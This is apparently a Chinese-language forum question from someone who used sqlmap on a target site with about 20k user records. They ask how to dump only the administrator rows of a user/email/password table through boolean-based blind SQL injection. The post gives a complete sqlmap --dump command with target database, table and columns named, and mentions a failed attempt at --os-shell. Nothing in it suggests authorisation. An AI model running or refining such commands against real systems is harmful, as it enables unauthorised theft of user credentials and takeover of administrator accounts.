我用sqlmap找到了漏洞的目标,并且有20k的数据
+-------------+----------------+--------------+
| usertype | email | password |
+-------------+----------------+--------------+
| User | example@ex.com | 12345678 |
| Admin | example@ex.com | 12345678 |
| Admin | example@ex.com | 12345678 |
| User | example@ex.com | 12345678 |
| ... | | |
+-------------+----------------+--------------+
我正在使用注入类型boolean-based blind - WHERE or HAVING clause,现在我如何转储只有User Type管理员的数据?
我的命令是
python sqlmap.py -u https://example.com --data "inject=0&data=1*" --cookie="user_session=example" -D user_data -T table_user -C usertype,email,password --dump --level 2 --risk 2
如果使用应该使用WHERE语句的 sql 命令,但使用语句不起作用--os-shell